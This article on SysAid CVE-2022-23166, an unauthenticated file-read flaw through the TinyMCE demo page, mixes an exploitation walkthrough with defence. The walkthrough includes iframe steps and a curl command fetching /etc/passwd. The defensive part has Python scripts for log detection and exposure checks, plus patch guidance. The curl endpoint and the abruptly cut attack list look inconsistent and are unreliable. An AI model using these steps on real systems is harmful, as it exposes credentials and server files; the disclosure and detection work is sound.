SysAid is widely used IT Service Management (ITSM) software for help desks and IT service automation. In 2022, a critical security flaw was disclosed in SysAid (CVE-2022-23166) that allows unauthenticated attackers to read sensitive files from the server through a Local File Inclusion (LFI) vulnerability. This article walks you through the vulnerability, step-by-step exploitation with simple code snippets, and ways to protect your system.

What is CVE-2022-23166?

CVE-2022-23166 is a Local File Inclusion vulnerability affecting certain versions of SysAid. Due to improper access controls on the /lib/tinymce/examples/index.html path, attackers can open the TinyMCE "Insert/Edit Embedded Media" feature and load arbitrary files from the underlying server via the iframe option — no login required.

Open the TinyMCE demo page in a browser:

http://[TARGET-IP]/lib/tinymce/examples/index.html

You should see the TinyMCE editor demo, even if you're not logged into SysAid. This is the unauthenticated entry point for the attack.

In the editor, follow these steps:

1. Click the _Insert/Edit Embedded Media_ button (looks like a film strip or media icon).

2. Set the media type to "iFrame" and enter the path of a file on the server as the source. On a Windows host, for example:

`/windows/win.ini`

On a Linux host:

`/etc/passwd`

3. Click OK. The content of the file should now be loaded in the editor preview.

3. Example Exploit

If you want to automate this for testing (in an authorized pentest only), you could use a simple curl command:

curl "http://[TARGET-IP]/lib/tinymce/plugins/media/filepicker.php?file=/etc/passwd"

Or, if you are using a browser, just browse to /lib/tinymce/examples/index.html, open the media insert dialog, select "iFrame" and enter a path such as /etc/passwd or any other file you want to read.

4. Screenshot Example

*You would now see the contents of /etc/passwd in the preview window — confirming the LFI vulnerability is present:*

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...

Attackers can use this LFI to:

- Grab sensitive files (/etc/passwd, application configuration files, database credentials)
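Exploitation of this flaw leaves a clear trail in the web server's access log: an unauthenticated hit on the demo page, followed by requests whose path contains the file the attacker wants (the two names from the walkthrough above, often percent-encoded or prefixed with `../` sequences). The script below, added here as an example and not taken from SysAid, SEC Consult or the original article, scans combined-format log lines (an assumption: Apache httpd / Tomcat AccessLogValve `%h %l %u %t "%r" %>s %b` layout) for that pattern. The sample log lines are constructed for the example; the severity labels and rule order are choices made for this example.

```python
import re
from typing import Dict, List, Set
from urllib.parse import unquote

# Combined log format (assumption: Apache httpd / Tomcat AccessLogValve layout).
# Only the fields the rules need are captured; trailing referer/UA fields are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

DEMO_PATH = "/lib/tinymce/examples/index.html"
# File names used in the article's walkthrough; extend with your deployment's own secrets.
SENSITIVE_FILES = ("/etc/passwd", "win.ini")
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one alert per log line that looks like CVE-2022-23166 activity."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash
        # Decode percent-encoding twice so single- and double-encoded paths match too.
        path = unquote(unquote(m["path"])).lower()
        status = int(m["status"])
        if path.split("?", 1)[0] == DEMO_PATH:
            # A 200 means the demo page is still reachable without login;
            # 401/403/404 shows the workaround or the patch is in place.
            reason = "tinymce demo page requested"
            sev = "high" if status == 200 else "info"
        elif any(name in path for name in SENSITIVE_FILES):
            reason = "sensitive file name in request path"
            sev = "high" if status == 200 else "medium"
        elif TRAVERSAL_RE.search(path):
            reason = "directory traversal sequence in request path"
            sev = "medium"
        else:
            continue
        alerts.append({"ip": m["ip"], "time": m["ts"], "path": m["path"],
                       "status": status, "severity": sev, "reason": reason})
    return alerts


def high_severity_ips(alerts: List[Dict[str, object]]) -> Set[str]:
    """Source addresses with at least one high-severity alert (candidates for blocking)."""
    return {str(a["ip"]) for a in alerts if a["severity"] == "high"}


# Constructed sample log (not a real capture): one attacker, one benign client.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2022:10:01:02 +0000] "GET /lib/tinymce/examples/index.html HTTP/1.1" 200 18234 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2022:10:01:09 +0000] "GET /etc/passwd HTTP/1.1" 200 1821 "http://sysaid.example/lib/tinymce/examples/index.html" "Mozilla/5.0"
203.0.113.7 - - [12/May/2022:10:01:20 +0000] "GET /..%2F..%2Fwindows/win.ini HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.7 - - [12/May/2022:10:01:31 +0000] "GET /..%252F..%252Fetc/hosts HTTP/1.1" 400 0 "-" "curl/7.68.0"
198.51.100.4 - - [12/May/2022:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2022:10:03:00 +0000] "GET /lib/tinymce/examples/index.html HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for a in found:
        print(f"[{a['severity']:<6}] {a['ip']} {a['time']} {a['status']} {a['path']} ({a['reason']})")
    print("block candidates:", sorted(high_severity_ips(found)))
```

Run it against a real log with `scan(open("access.log").read().splitlines())`. Matching on the decoded, lower-cased path is what makes the encoded `win.ini` request and the double-encoded traversal attempt show up; a rule that only looks for the literal string `/etc/passwd` would miss both.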

Original References and Resources

- CVE Details for CVE-2022-23166
- SysAid Security Advisory
- Full Exploit Writeup (Sec Consult)
- Proof of Concept (Packet Storm)

How to Fix CVE-2022-23166

Cloud Users:  
Update to version 22.2.20 or newer.

On-premise Users:  
Update to version 22.1.64 or newer.  
You can download the latest update from the SysAid download portal.

> Tip: Until you can update, block access to /lib/tinymce/examples/index.html at the web server or reverse proxy as a short-term workaround (the TinyMCE demo page has no production use), and confirm that an unauthenticated request to it now returns 403 or 404.
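Both the walkthrough above (does the demo page load without logging in?) and the workaround tip come down to one check that is worth scripting across every SysAid instance you operate. The script below is added here as an example; it is not code from SysAid, SEC Consult or the original article. It assumes that the stock TinyMCE example page contains the string `tinymce` somewhere in its HTML, and the status codes treated as "blocked" are a choice made for this example.

```python
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass

DEMO_PATH = "/lib/tinymce/examples/index.html"
# Assumption: the stock TinyMCE example page references the editor script by name.
TINYMCE_MARKER = b"tinymce"


@dataclass
class ProbeResult:
    url: str
    status: int
    verdict: str  # "exposed", "blocked" or "inconclusive"


def classify(status: int, body: bytes) -> str:
    """Map an HTTP status/body pair to a verdict.

    200 with the editor marker  -> demo page reachable without login (exposed)
    401 / 403 / 404             -> access removed by patch or workaround (blocked)
    anything else               -> inconclusive, e.g. a 200 login page reached
                                   after a redirect, or a 5xx from the proxy
    """
    if status == 200 and TINYMCE_MARKER in body.lower():
        return "exposed"
    if status in (401, 403, 404):
        return "blocked"
    return "inconclusive"


def probe(base_url: str, timeout: float = 10.0) -> ProbeResult:
    """Request the demo page unauthenticated and classify the answer."""
    url = base_url.rstrip("/") + DEMO_PATH
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2022-23166-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read(65536)
    except urllib.error.HTTPError as err:
        # 4xx/5xx are raised as exceptions; the code and body are still what we need.
        status, body = err.code, err.read() or b""
    return ProbeResult(url, status, classify(status, body))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"usage: {sys.argv[0]} https://sysaid.example.com [more base URLs...]")
        sys.exit(2)
    worst = 0
    for base in sys.argv[1:]:
        r = probe(base)
        print(f"{r.url}: HTTP {r.status} -> {r.verdict}")
        if r.verdict != "blocked":
            worst = 1
    sys.exit(worst)  # non-zero if any instance is still exposed or could not be judged
```

Run it once before and once after applying the patch or the reverse-proxy rule; it exits non-zero unless every instance reports "blocked". Note that `urllib` follows redirects, so an instance that bounces the demo page to a login form will show up as "inconclusive" rather than "blocked", which is deliberate: a redirect is not proof that the file behind it is no longer served.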

Summary Table

| Vulnerability | CVE-2022-23166: SysAid Local File Inclusion (LFI) |
|---------------|--------------------------------------------------|
| Affected Path | /lib/tinymce/examples/index.html                |
| Attack Vector | Unauthenticated, remote via iframe                |
| Risk          | Read arbitrary server files                       |
| Fixed Version | Cloud: 22.2.20; On-premise: 22.1.64               |
| Patch         | Update SysAid; restrict access to vulnerable path |

Final Word

CVE-2022-23166 is easy to exploit — and just as easy to fix if you act quickly. Always keep your SysAid environment up to date and restrict access to any test/demo pages in production.


*This article is for education and authorized security testing only. Never test these vulnerabilities on systems without explicit permission.*

Further Reading

- OWASP LFI Explanation
- TinyMCE Security Best Practices

Timeline

Published on: 05/12/2022 20:15:00 UTC
Last modified on: 05/23/2022 20:31:00 UTC